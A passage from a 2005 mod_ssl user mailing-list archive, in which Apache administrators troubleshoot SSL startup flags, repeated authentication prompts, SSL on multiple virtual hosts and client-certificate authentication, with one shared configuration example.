iD8DBQFCuG+7st+vzJSwZikRAkQTAJ90dOrQfPiSAUfkUmBC86FHoF4q3ACcDWRp
AhbKUmB4KKzSvs0cwU66e1Y=
=KtmY
-----END PGP SIGNATURE-----
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 21 21:57:56 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4901E14D9C6; Tue, 21 Jun 2005 21:57:56 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail77-R-red.bigfish.com (mail-red.bigfish.com [216.148.222.61])
	by master.modssl.org (Postfix) with ESMTP id AC65D14D991
	for ; Tue, 21 Jun 2005 21:57:55 +0200 (CEST)
Received: from mail77-red.bigfish.com (localhost.localdomain [127.0.0.1])
	by mail77-R-red.bigfish.com (Postfix) with ESMTP id 75F3E3CEB90
	for ; Tue, 21 Jun 2005 19:57:54 +0000 (UTC)
X-BigFish: VPC
Received: by mail77-red (MessageSwitch) id 1119383874425137_9087; Tue, 21 Jun 2005 19:57:54 +0000 (UCT)
Received: from mailrelay5.pfizer.com (ns11.pfizer.com [192.77.198.11])
	by mail77-red.bigfish.com (Postfix) with ESMTP id 457BE3D4BB2
	for ; Tue, 21 Jun 2005 19:57:54 +0000 (UTC)
Received: from [10.35.88.102] (localhost [127.0.0.1])
	by mailrelay5.pfizer.com (Switch-3.0.5/Switch-3.0.0) with ESMTP id j5LJvrVk027095
	for ; Tue, 21 Jun 2005 15:57:53 -0400 (EDT)
Mime-Version: 1.0 (Apple Message framework v730)
In-Reply-To: 
References: <0FBD3725-3258-422E-ABDB-7CF5A232E60F@internection.com>  <620C889C-85E6-4328-9F84-91816BAEBB97@internection.com> 
Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed
Message-Id: 
Content-Transfer-Encoding: 7bit
From: Jon August 
Subject: Re: Apache starts, SSL site unavailable
Date: Tue, 21 Jun 2005 15:57:52 -0400
To: modssl-users@modssl.org
X-Mailer: Apple Mail (2.730)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jon August 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I am running the server with the -D SSL option now and all is well.

Thanks for the help Cliff and Ron.

     -Jon


On Jun 21, 2005, at 3:51 PM, R. DuFresne wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> On Tue, 21 Jun 2005, Jon August wrote:
>
>
>>
>>
>> Can I just remove the IfDefine tags?  or is that not recommended?
>>
>>
>>
>
> You could though the gain might not be there, why not just run the  
> server in the proper mode?
>
> Thanks,
>
> Ron DuFresne
>
>
>
>>
>> On Jun 21, 2005, at 2:35 PM, Cliff Woolley wrote:
>>
>>
>>> On Tue, 21 Jun 2005, Jon August wrote:
>>>
>>>> Hi,
>>>> I'm switching from Stronghold to Apache 2.0.54 with mod_ssl  
>>>> enabled.
>>>> When I start apache, everything appears to work except the SSL  
>>>> site.
>>>> There's some sort of warning about the cache.  mod_ssl.c is  
>>>> listed as
>>>> a compiled in module, and there's an: Include conf/ssl.conf in the
>>>> httpd.conf  Any suggestions would be greatly appreciated.
>>>>
>>> Are you starting httpd with the -D SSL command line argument?  If  
>>> not,
>>> then the entire block of configuration directives inside the  
>>> >> SSL> container in your config file will be ignored.
>>> --Cliff
>>>
>>
>>
>> _____________________________________________________________________ 
>> _
>> Apache Interface to OpenSSL (mod_ssl)                    
>> www.modssl.org
>> User Support Mailing List                      modssl- 
>> users@modssl.org
>> Automated List Manager                             
>> majordomo@modssl.org
>>
>>
>
> - -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>         admin & senior security consultant:  sysinfo.com
>                         http://sysinfo.com
> Key fingerprint = 9401 4B13 B918 164C 647A  E838 B2DF AFCC 94B0 6629
>
> ...We waste time looking for the perfect lover
> instead of creating the perfect love.
>
>                 -Tom Robbins 
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.2.4 (GNU/Linux)
>
> iD8DBQFCuG+7st+vzJSwZikRAkQTAJ90dOrQfPiSAUfkUmBC86FHoF4q3ACcDWRp
> AhbKUmB4KKzSvs0cwU66e1Y=
> =KtmY
> -----END PGP SIGNATURE-----
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 21 23:27:16 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id EED3914D9C9; Tue, 21 Jun 2005 23:27:16 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ares.cs.Virginia.EDU (ares.cs.Virginia.EDU [128.143.137.19])
	by master.modssl.org (Postfix) with ESMTP id 7EE7114D991
	for ; Tue, 21 Jun 2005 23:27:15 +0200 (CEST)
Received: from cobra.cs.Virginia.EDU (cobra.cs.Virginia.EDU [128.143.137.16])
	by ares.cs.Virginia.EDU (8.13.4/8.13.4/UVACS-2005041801) with ESMTP id j5LLQvqn010325;
	Tue, 21 Jun 2005 17:26:59 -0400 (EDT)
Date: Tue, 21 Jun 2005 17:26:57 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: jcw5q@cobra.cs.Virginia.EDU
To: Jon August 
Cc: modssl-users@modssl.org
Subject: Re: Apache starts, SSL site unavailable
In-Reply-To: <620C889C-85E6-4328-9F84-91816BAEBB97@internection.com>
Message-ID: 
References: <0FBD3725-3258-422E-ABDB-7CF5A232E60F@internection.com>
 
 <620C889C-85E6-4328-9F84-91816BAEBB97@internection.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, 21 Jun 2005, Jon August wrote:

> Can I just remove the IfDefine tags?  or is that not recommended?

Yes, feel free.  My understanding is that the only reason it's in there in
the first place is to try to make it clear that SSL isn't something you
can have work directly out of the box... you have to go and generate
yourself a private key and certificate request and so forth.

Unfortunately it has the side-effect of getting in the way sometimes, so
it's a lesser-of-two-evils situation I suppose.

--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 22 02:36:07 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 1E55814D9C9; Wed, 22 Jun 2005 02:36:07 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns21.alterhosting.net (ns21.alterhosting.net [66.98.248.62])
	by master.modssl.org (Postfix) with ESMTP id 8DDC514D998
	for ; Wed, 22 Jun 2005 02:36:05 +0200 (CEST)
Received: (qmail 21766 invoked from network); 22 Jun 2005 01:33:29 -0000
Received: from c-67-170-174-20.hsd1.or.comcast.net (HELO laptop) (67.170.174.20)
  by ns21.alterhosting.net with RC4-MD5 encrypted SMTP; 22 Jun 2005 01:33:28 -0000
Message-ID: <003501c576c2$38966300$0a00a8c0@laptop>
From: "C T" 
To: 
Subject: certificate and authentication re-prompting
Date: Tue, 21 Jun 2005 17:34:54 -0700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0032_01C57687.892AC030"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2527
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2527
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "C T" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0032_01C57687.892AC030
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

I need some advice/help.

I am running...well my web host service is running...

Apache/2.0.46 (Red Hat) Server

openssl-0.9.7a-33.12=20

mod_ssl-2.0.46-44.ent

Also, I was originally set up through some kind of "virtual hosting", =
but I paid extra for SSL, and I have a httpsdocs folder. (if you can't =
tell I'm new to this)

I also use .htaccess with .htpasswd for user authentication.

Everything seems to be working fine, but my problem is...

I can enter my domain with the https://. OK

I get prompted to accept the certificate, and I get prompted for the =
username/password. OK

The problem surfaces when I begin to browse around in the https area. =
Sooner or later I will get re-prompted to accept the certificate and =
enter my username/password, again.

I don't know why it does this, and my web hosting service can't seem to =
explain it either.

I've reproduced the error on more than 4 computers.

I can't find anything that would cause my browser session to expire, in =
mid-session.

Can anyone help me or give me a direction to go in?

Be Kind, I'm a new to apache and mod_ssl.

Thanks,

Craig=20

willtop31@epsfh.com

------=_NextPart_000_0032_01C57687.892AC030
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable











I need some advice/help.


I am running...well my web host service is running...


Apache/2.0.46 (Red Hat) Server


openssl-0.9.7a-33.12 


mod_ssl-2.0.46-44.ent


Also, I was originally set up through some kind of "virtual hosting", =
but I=20
paid extra for SSL, and I have a httpsdocs folder. (if you can't tell =
I'm new to=20
this)


I also use .htaccess with .htpasswd for user authentication.


Everything seems to be working fine, but my problem is...


I can enter my domain with the https://. OK


I get prompted to accept the certificate, and I get prompted for the=20
username/password. OK


The problem surfaces when I begin to browse around in the https area. =
Sooner=20
or later I will get re-prompted to accept the certificate and enter my=20
username/password, again.


I don't know why it does this, and my web hosting service can't seem =
to=20
explain it either.


I've reproduced the error on more than 4 computers.


I can't find anything that would cause my browser session to expire, =
in=20
mid-session.


Can anyone help me or give me a direction to go in?


Be Kind, I'm a new to apache and mod_ssl.


Thanks,


Craig 


willtop31@epsfh.com


------=_NextPart_000_0032_01C57687.892AC030--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 22 11:21:34 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8E57B14D9CA; Wed, 22 Jun 2005 11:21:34 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from warthog.se (mail.warthog.se [212.247.84.253])
	by master.modssl.org (Postfix) with ESMTP id 4311914D998
	for ; Wed, 22 Jun 2005 11:21:33 +0200 (CEST)
Received: from p416002 [192.168.1.20]
	by warthog.se [127.0.0.1]
	with SMTP (MDaemon.PRO.v4.0.5.R)
	for ; Wed, 22 Jun 2005 11:21:05 +0200
Message-ID: <001001c5770b$b8eca7f0$1401a8c0@p416002>
From: "Daniel Kimblad" 
To: 
References: <003501c576c2$38966300$0a00a8c0@laptop>
Subject: Re: certificate and authentication re-prompting
Date: Wed, 22 Jun 2005 11:21:07 +0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_000D_01C5771C.7C4A9760"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1506
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1506
X-MDRemoteIP: 192.168.1.20
X-Return-Path: daniel.kimblad@gizmondostudios.se
X-MDaemon-Deliver-To: modssl-users@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Daniel Kimblad" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_000D_01C5771C.7C4A9760
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Could be your browsers settings. If you're running Firefox go to
the menu Tools > Options. Select Advanced and scroll down to
the Certificates area.
Set Client Certificate Selection to Select Automatically. This is
often the cause of such behaviour. Hope this helps.

Best regards
/Daniel
  ----- Original Message -----=20
  From: C T=20
  To: modssl-users@modssl.org=20
  Sent: Wednesday, June 22, 2005 2:34 AM
  Subject: certificate and authentication re-prompting


  I need some advice/help.

  I am running...well my web host service is running...

  Apache/2.0.46 (Red Hat) Server

  openssl-0.9.7a-33.12=20

  mod_ssl-2.0.46-44.ent

  Also, I was originally set up through some kind of "virtual hosting", =
but I paid extra for SSL, and I have a httpsdocs folder. (if you can't =
tell I'm new to this)

  I also use .htaccess with .htpasswd for user authentication.

  Everything seems to be working fine, but my problem is...

  I can enter my domain with the https://. OK

  I get prompted to accept the certificate, and I get prompted for the =
username/password. OK

  The problem surfaces when I begin to browse around in the https area. =
Sooner or later I will get re-prompted to accept the certificate and =
enter my username/password, again.

  I don't know why it does this, and my web hosting service can't seem =
to explain it either.

  I've reproduced the error on more than 4 computers.

  I can't find anything that would cause my browser session to expire, =
in mid-session.

  Can anyone help me or give me a direction to go in?

  Be Kind, I'm a new to apache and mod_ssl.

  Thanks,

  Craig=20

  willtop31@epsfh.com

------=_NextPart_000_000D_01C5771C.7C4A9760
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Could be your browsers settings. If =
you're running=20
Firefox go to


the menu Tools > Options. Select =
Advanced and=20
scroll down to


the Certificates area.


Set Client Certificate Selection to =
Select=20
Automatically. This is


often the cause of such behaviour. =
Hope this helps.


 


Best regards


/Daniel



  
----- Original Message ----- 

  From:=20
  C =
T 
  
  
Sent: Wednesday, June 22, 2005 =
2:34=20
  AM

  
Subject: certificate and =
authentication=20
  re-prompting

  


  

  
I need some advice/help.

  
I am running...well my web host service is running...

  
Apache/2.0.46 (Red Hat) Server

  
openssl-0.9.7a-33.12 

  
mod_ssl-2.0.46-44.ent

  
Also, I was originally set up through some kind of "virtual =
hosting", but I=20
  paid extra for SSL, and I have a httpsdocs folder. (if you can't tell =
I'm new=20
  to this)

  
I also use .htaccess with .htpasswd for user authentication.

  
Everything seems to be working fine, but my problem is...

  
I can enter my domain with the https://. OK

  
I get prompted to accept the certificate, and I get prompted for =
the=20
  username/password. OK

  
The problem surfaces when I begin to browse around in the https =
area.=20
  Sooner or later I will get re-prompted to accept the certificate and =
enter my=20
  username/password, again.

  
I don't know why it does this, and my web hosting service can't =
seem to=20
  explain it either.

  
I've reproduced the error on more than 4 computers.

  
I can't find anything that would cause my browser session to =
expire, in=20
  mid-session.

  
Can anyone help me or give me a direction to go in?

  
Be Kind, I'm a new to apache and mod_ssl.

  
Thanks,

  
Craig 

  =

willtop31@epsfh.com
=


------=_NextPart_000_000D_01C5771C.7C4A9760--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 22 21:06:36 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C53FA14D9B2; Wed, 22 Jun 2005 21:06:36 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mtaout-w.tc.umn.edu (mtaout-w.tc.umn.edu [160.94.160.21])
	by master.modssl.org (Postfix) with ESMTP id CD40714D998
	for ; Wed, 22 Jun 2005 21:06:34 +0200 (CEST)
Received: from omwl587lap (omwl-587-lap.lib.umn.edu [128.101.98.71]) by mtaout-w.tc.umn.edu with ESMTP for modssl-users@modssl.org; Wed, 22 Jun 2005 14:06:33 -0500 (CDT)
X-Umn-Remote-Mta: [N] omwl-587-lap.lib.umn.edu [128.101.98.71] #+LO+TS+AU+HN
Message-Id: 
From: "Jeffrey M. Johnson" 
To: 
Subject: Multiple Virtual Servers with modssl
Date: Wed, 22 Jun 2005 14:06:32 -0500
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0093_01C57733.982AB3E0"
X-Mailer: Microsoft Office Outlook, Build 11.0.5510
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
Thread-Index: AcV3XYCmqvvHZKU1SGCXWZ8CJ9SJug==
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeffrey M. Johnson" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0093_01C57733.982AB3E0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

I am knew to this list and have spent many hours looking for an answer I am
sure is probably right in front of my face.

 

I have a host that has 40 some virtual hosts associated with it, but only
one of those hosts is configured for modssl.   I know need to configure a
second (and possible more) virtualhosts for modssl.

 

First, I am assuming this can be done.

Second, I can't figure out how it can be done.

 

Any help would be appreciated.

 

Jeff 


------=_NextPart_000_0093_01C57733.982AB3E0
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
















I am knew to this list and have spent many hours =
looking for
an answer I am sure is probably right in front of my =
face.



 



I have a host that has 40 some virtual hosts =
associated with
it, but only one of those hosts is configured for modssl.   I =
know
need to configure a second (and possible more) virtualhosts for =
modssl.



 



First, I am assuming this can be =
done.



Second, I can’t figure out how it can be =
done.



 



Any help would be =
appreciated.



 



Jeff 









------=_NextPart_000_0093_01C57733.982AB3E0--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 22 21:08:21 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7CC2C14D9E0; Wed, 22 Jun 2005 21:08:21 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from whisker.bluecoat.com (whisker.bluecoat.com [216.52.23.28])
	by master.modssl.org (Postfix) with ESMTP id D3B2614D9B0
	for ; Wed, 22 Jun 2005 21:08:20 +0200 (CEST)
Received: from bcs-mail.bluecoat.com (bcs-mail.bluecoat.com [216.52.23.69])
	by whisker.bluecoat.com (8.13.0/8.13.0) with ESMTP id j5MJ8GnX010176
	for ; Wed, 22 Jun 2005 12:08:16 -0700 (PDT)
Received: from bcs-mail3.bluecoat.com ([10.2.2.59]) by bcs-mail.bluecoat.com with Microsoft SMTPSVC(5.0.2195.5329);
	 Wed, 22 Jun 2005 12:08:16 -0700
X-MimeOLE: Produced By Microsoft Exchange V6.0.6603.0
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C5775D.BE5D3CAA"
Subject: RE: Multiple Virtual Servers with modssl
Date: Wed, 22 Jun 2005 12:08:15 -0700
Message-ID: <48D44BB27BDE3840BDF18E59CB169A5C1F9FBB@bcs-mail3.internal.cacheflow.com>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Multiple Virtual Servers with modssl
Thread-Index: AcV3XYCmqvvHZKU1SGCXWZ8CJ9SJugAACMVg
From: "Tumu, Shiv" 
To: 
X-OriginalArrivalTime: 22 Jun 2005 19:08:16.0285 (UTC) FILETIME=[BE924CD0:01C5775D]
X-Scanned-By: MIMEDefang 2.49 on 216.52.23.28
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Tumu, Shiv" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C5775D.BE5D3CAA
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

=20

Are there any free tools out there that test ssl proxy in terms of =
functionality or security?


------_=_NextPart_001_01C5775D.BE5D3CAA
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable











 



  
Are there any free tools out there that =
test ssl=20
  proxy in terms of functionality or=20
security?


------_=_NextPart_001_01C5775D.BE5D3CAA--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 22 21:21:17 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 1E79214D9B2; Wed, 22 Jun 2005 21:21:15 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cr.toftum.org (cpe.atm2-0-76391.0x535ae692.bynxx16.customer.tele.dk [83.90.230.146])
	by master.modssl.org (Postfix) with ESMTP id 9F6D914D998
	for ; Wed, 22 Jun 2005 21:21:13 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by cr.toftum.org (Postfix) with ESMTP id 2CC4F1D0177
	for ; Wed, 22 Jun 2005 21:29:09 +0200 (CEST)
Received: from cr.toftum.org ([127.0.0.1])
 by localhost (cr [127.0.0.1]) (amavisd-new, port 10024) with ESMTP
 id 04165-10 for ;
 Wed, 22 Jun 2005 21:29:05 +0200 (CEST)
Received: by cr.toftum.org (Postfix, from userid 1000)
	id 19CD82AB37B; Wed, 22 Jun 2005 21:29:05 +0200 (CEST)
Date: Wed, 22 Jun 2005 21:29:04 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Multiple Virtual Servers with modssl
Message-ID: <20050622192904.GA3518@cr>
Mail-Followup-To: modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
X-Virus-Scanned: amavisd-new at toftum.dk
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, Jun 22, 2005 at 02:06:32PM -0500, Jeffrey M. Johnson wrote:
> I have a host that has 40 some virtual hosts associated with it, but only
> one of those hosts is configured for modssl.   I know need to configure a
> second (and possible more) virtualhosts for modssl.
> 
> First, I am assuming this can be done.
> 
Yes - but you might not like the answer - as you'll need one ip(or
non-std port) for each ssl vhost.

> Second, I can't figure out how it can be done.
> 
Just add one more ip based vhost with the necessary settings - and
before you ask about name based vhosting with ssl - go see the ssl FAQ:
http://httpd.apache.org/docs-2.0/ssl/ssl_faq.html#vhosts2

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 22 21:23:35 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B630814D9B2; Wed, 22 Jun 2005 21:23:35 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from orb.pobox.com (orb.pobox.com [207.8.226.5])
	by master.modssl.org (Postfix) with ESMTP id 9F87014D998
	for ; Wed, 22 Jun 2005 21:23:34 +0200 (CEST)
Received: from orb (localhost [127.0.0.1])
	by orb.pobox.com (Postfix) with ESMTP id 91B9F2244
	for ; Wed, 22 Jun 2005 15:23:22 -0400 (EDT)
Received: from [157.179.245.119] (wormhole.crcnet1.com [65.211.127.5])
	(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
	(No client certificate requested)
	by orb.sasl.smtp.pobox.com (Postfix) with ESMTP id 82E3E91
	for ; Wed, 22 Jun 2005 15:23:22 -0400 (EDT)
Message-ID: <42B9BA3A.8050802@w3works.com>
Date: Wed, 22 Jun 2005 15:21:30 -0400
From: Dave Paris 
User-Agent: Mozilla Thunderbird 1.0.2 (Windows/20050317)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Multiple Virtual Servers with modssl
References: 
In-Reply-To: 
Content-Type: text/plain; charset=windows-1252; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dave Paris 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Jeffrey M. Johnson wrote:
> I am knew to this list and have spent many hours looking for an answer I 
> am sure is probably right in front of my face.

"knew"?!  from a .edu address?  ::boggle::  alas, I digress.

> I have a host that has 40 some virtual hosts associated with it, but 
> only one of those hosts is configured for modssl.   I know need to 
> configure a second (and possible more) virtualhosts for modssl.

No such thing as multiple hosts under one certificate.  Use one 
certificate per virtual host.

> First, I am assuming this can be done.

Bad assumption.  It can't by virtue of the the design of SSL.

> Second, I can’t figure out how it can be done.

See my previous answer.

> Any help would be appreciated.

Search the archives.  This one rears its ugly head fairly frequently.

-dsp
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 23 19:27:34 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C94A414D9C9; Thu, 23 Jun 2005 19:27:34 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mclean-vscan5.bah.com (mclean-vscan5.bah.com [156.80.3.66])
	by master.modssl.org (Postfix) with ESMTP id 4C2D314D995
	for ; Thu, 23 Jun 2005 19:27:31 +0200 (CEST)
Received: from mclean-vscan5.bah.com (mclean-vscan5.bah.com [156.80.3.66])
	by mclean-vscan5.bah.com (8.11.0/8.11.0) with SMTP id j5NHRNw05108
	for ; Thu, 23 Jun 2005 13:27:23 -0400 (EDT)
Received: from mclnexbh03.resource.ds.bah.com ([156.80.7.153])
 by mclean-vscan5.bah.com (SAVSMTP 3.1.6.45) with SMTP id M2005062313272306378
 for ; Thu, 23 Jun 2005 13:27:23 -0400
Received: from MCLNEXVS07.resource.ds.bah.com ([156.80.7.141]) by mclnexbh03.resource.ds.bah.com with Microsoft SMTPSVC(6.0.3790.211);
	 Thu, 23 Jun 2005 13:27:23 -0400
X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: RE: SSL Client Auth with Virtual Hosts
Date: Thu, 23 Jun 2005 13:27:23 -0400
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: SSL Client Auth with Virtual Hosts
Thread-Index: AcVwr6/q2odkMOIwQ4CZ4N4lmiff2gHaE69A
From: "Hoda Nadeem" 
To: 
X-OriginalArrivalTime: 23 Jun 2005 17:27:23.0897 (UTC) FILETIME=[D17AEE90:01C57818]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Hoda Nadeem" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


A team member was able to find a working solution (issue: single IP, two
domains, one domain requires client auth, the other domain plain SSL,
both functional with same apache instance using virtual hosts):

NameVirtualHost :443

:443>

    ServerAdmin adsfasfsa@asdfasfds.com
    DocumentRoot /var/www
    ServerName =20
    ErrorLog /var/log/httpd/error_log
    CustomLog /var/log/httpd/access_log common
   =20
    SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown
   =20
    SSLEngine on
    SSLCertificateFile /etc/httpd/conf/ssl.crt/server.crt
    SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.key
   =20
    
         SSLVerifyClient require
         SSLVerifyDepth 5=20
         SSLCACertificateFile /etc/httpd/conf/ssl.crt/server-calist.crt
         SSLOptions +StdEnvVars +ExportCertData +OptRenegotiate
    



:443>

    ServerAdmin adsfasfsa@asdfasfds.com
    DocumentRoot /var/www
    ServerName 
    ErrorLog /var/log/httpd/error_log
    CustomLog /var/log/httpd/access_log common
   =20
    SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown
   =20
    SSLEngine on
    SSLCertificateFile /etc/httpd/conf/ssl.crt/server.crt
    SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.key



=20

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Eckard Wille
Sent: Tuesday, June 14, 2005 3:06 AM
To: modssl-users@modssl.org
Subject: Re: SSL Client Auth with Virtual Hosts

Hoda Nadeem schrieb:
> Eckard and All,
>=20
> Does anybody know if there is any work around to get the following=20
> scenario to work?
>=20
> 1 IP Address
> 2 domain names attached to the same server IP address
> 2 SSL virtual hosts: 1 with client authentication, 1 without client=20
> authentication
>=20
> I need to try to avoid using a second IP address for the same server.
> Some folks are insisting that there must be a way to get the scenario=20
> to work.

Hi,

